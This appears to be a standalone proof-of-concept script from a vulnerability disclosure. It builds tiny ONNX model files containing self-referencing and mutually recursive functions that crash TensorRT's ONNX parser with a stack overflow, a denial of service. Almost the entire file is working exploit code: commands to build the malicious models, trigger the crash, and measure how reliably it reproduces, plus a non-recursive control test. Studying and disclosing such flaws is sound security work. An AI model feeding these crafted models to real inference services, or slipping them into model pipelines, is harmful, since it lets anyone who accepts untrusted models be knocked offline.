tensorrt-onnx-recursive-function-crash / vuln010_standalone_poc.py
treforbenbow's picture
Upload vuln010_standalone_poc.py with huggingface_hub
4d6c78f verified
"""
VULN-010: Uncontrolled Recursion in TensorRT ONNX Parser via Recursive FunctionProto
=====================================================================================
A 110-byte ONNX model with a self-referencing FunctionProto crashes TensorRT's
ONNX parser with stack overflow (STATUS_STACK_OVERFLOW / 0xC00000FD) during
parse(). The parser performs unbounded recursion when expanding the function
definition, exhausting the call stack.
CWE: CWE-674 (Uncontrolled Recursion)
Affected: TensorRT 10.x nvonnxparser (parse phase)
Severity: High (CVSS 7.5) — DoS via crafted model file
To reproduce:
python vuln010_standalone_poc.py build # Create PoC .onnx files
python vuln010_standalone_poc.py crash # Trigger crash (will terminate)
python vuln010_standalone_poc.py verify # Full verification suite
"""
import os, sys, subprocess, time
POC_DIR = os.path.dirname(os.path.abspath(__file__))
SELF_REC_PATH = os.path.join(POC_DIR, "vuln010_self_recursive.onnx")
MUTUAL_REC_PATH = os.path.join(POC_DIR, "vuln010_mutual_recursive.onnx")
def cmd_build():
"""Build PoC ONNX model files."""
from onnx import helper, TensorProto
# PoC 1: Self-recursive function (110 bytes)
func = helper.make_function(
"r", "R", ["X"], ["Y"],
[helper.make_node("R", ["X"], ["Y"], domain="r")],
opset_imports=[helper.make_opsetid("", 17), helper.make_opsetid("r", 1)])
g = helper.make_graph(
[helper.make_node("R", ["i"], ["o"], domain="r")],
"g",
[helper.make_tensor_value_info("i", TensorProto.FLOAT, [1])],
[helper.make_tensor_value_info("o", TensorProto.FLOAT, [1])])
model = helper.make_model(g, opset_imports=[
helper.make_opsetid("", 17), helper.make_opsetid("r", 1)],
functions=[func])
model.ir_version = 8
raw = model.SerializeToString()
with open(SELF_REC_PATH, "wb") as f:
f.write(raw)
print(f"[+] Self-recursive PoC: {SELF_REC_PATH} ({len(raw)} bytes)")
# PoC 2: Mutually recursive functions (152 bytes)
fa = helper.make_function("m", "A", ["X"], ["Y"],
[helper.make_node("B", ["X"], ["Y"], domain="m")],
opset_imports=[helper.make_opsetid("", 17), helper.make_opsetid("m", 1)])
fb = helper.make_function("m", "B", ["X"], ["Y"],
[helper.make_node("A", ["X"], ["Y"], domain="m")],
opset_imports=[helper.make_opsetid("", 17), helper.make_opsetid("m", 1)])
g = helper.make_graph(
[helper.make_node("A", ["i"], ["o"], domain="m")],
"g",
[helper.make_tensor_value_info("i", TensorProto.FLOAT, [1])],
[helper.make_tensor_value_info("o", TensorProto.FLOAT, [1])])
model = helper.make_model(g, opset_imports=[
helper.make_opsetid("", 17), helper.make_opsetid("m", 1)],
functions=[fa, fb])
model.ir_version = 8
raw = model.SerializeToString()
with open(MUTUAL_REC_PATH, "wb") as f:
f.write(raw)
print(f"[+] Mutual-recursive PoC: {MUTUAL_REC_PATH} ({len(raw)} bytes)")
# Verify with Python onnx library (should NOT crash)
import onnx
from onnx import checker
for path in [SELF_REC_PATH, MUTUAL_REC_PATH]:
model = onnx.load(path)
try:
checker.check_model(model)
print(f"[+] onnx.checker passes: {os.path.basename(path)}")
except Exception as e:
print(f"[!] onnx.checker fails: {os.path.basename(path)}: {e}")
print("\n[*] Run 'python vuln010_standalone_poc.py crash' to trigger the crash.")
def cmd_crash():
"""Load the PoC model with TensorRT (will crash)."""
import tensorrt as trt
print("[*] Loading self-recursive PoC with TensorRT...")
print(f"[*] File: {SELF_REC_PATH}")
print("[!] This WILL crash the process with stack overflow.")
print()
logger = trt.Logger(trt.Logger.WARNING)
builder = trt.Builder(logger)
network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
print("[*] Calling parser.parse_from_file()...")
ok = parser.parse_from_file(SELF_REC_PATH)
# Should never reach here
print(f"[?] parse returned: {ok} (unexpected - should have crashed)")
def cmd_verify():
"""Full verification suite via subprocesses."""
print("=" * 60)
print("VULN-010 Verification Suite")
print("=" * 60)
if not os.path.exists(SELF_REC_PATH):
print("[!] PoC files not found. Run 'build' first.")
return
tests = [
("Self-recursive (parse_from_file)", SELF_REC_PATH),
("Mutual-recursive (parse_from_file)", MUTUAL_REC_PATH),
]
for desc, model_path in tests:
print(f"\n[*] Test: {desc}")
print(f" File: {model_path} ({os.path.getsize(model_path)} bytes)")
script = f'''
import tensorrt as trt, sys
logger = trt.Logger(trt.Logger.ERROR)
builder = trt.Builder(logger)
network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
ok = parser.parse_from_file(r"{model_path}")
print(f"PARSE_{{'OK' if ok else 'FAIL'}}")
'''
results = []
for trial in range(5):
t0 = time.time()
try:
r = subprocess.run([sys.executable, "-c", script],
capture_output=True, text=True, timeout=15)
dt = time.time() - t0
rc = r.returncode & 0xFFFFFFFF if r.returncode < 0 else r.returncode
if rc == 0xC00000FD:
status = "STACK_OVERFLOW"
elif rc == 0xC0000005:
status = "ACCESS_VIOLATION"
elif r.returncode != 0:
status = f"CRASH_0x{rc:08X}"
else:
status = r.stdout.strip().split('\n')[-1] if r.stdout.strip() else "?"
except subprocess.TimeoutExpired:
status = "TIMEOUT"
dt = 15
results.append(status)
print(f" Trial {trial+1}/5: {status} ({dt:.1f}s)")
crash_count = sum(1 for s in results if "STACK" in s or "ACCESS" in s or "CRASH" in s)
print(f" Result: {crash_count}/5 crashes ({crash_count*100//5}% reproducible)")
# Control test: non-recursive function should NOT crash
print(f"\n[*] Control test: non-recursive function (should NOT crash)")
script = '''
import tensorrt as trt, sys
from onnx import helper, TensorProto
func = helper.make_function("f", "MyRelu", ["X"], ["Y"],
[helper.make_node("Relu", ["X"], ["Y"])],
opset_imports=[helper.make_opsetid("", 17)])
g = helper.make_graph(
[helper.make_node("MyRelu", ["input"], ["output"], domain="f")],
"g",
[helper.make_tensor_value_info("input", TensorProto.FLOAT, [2, 3])],
[helper.make_tensor_value_info("output", TensorProto.FLOAT, [2, 3])])
model = helper.make_model(g, opset_imports=[
helper.make_opsetid("", 17), helper.make_opsetid("f", 1)],
functions=[func])
model.ir_version = 8
logger = trt.Logger(trt.Logger.ERROR)
builder = trt.Builder(logger)
network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
ok = parser.parse(model.SerializeToString())
print(f"PARSE_{'OK' if ok else 'FAIL'} layers={network.num_layers}")
if ok:
config = builder.create_builder_config()
config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 256 << 20)
engine = builder.build_serialized_network(network, config)
print(f"BUILD_{'OK' if engine else 'FAIL'}")
'''
r = subprocess.run([sys.executable, "-c", script],
capture_output=True, text=True, timeout=30)
print(f" {r.stdout.strip()}")
print(f" Exit code: {r.returncode} ({'OK' if r.returncode == 0 else 'CRASH'})")
print("\n" + "=" * 60)
print("VERIFICATION COMPLETE")
print("=" * 60)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python vuln010_standalone_poc.py [build|crash|verify]")
sys.exit(1)
cmd = sys.argv[1]
if cmd == "build":
cmd_build()
elif cmd == "crash":
cmd_crash()
elif cmd == "verify":
cmd_verify()
else:
print(f"Unknown command: {cmd}")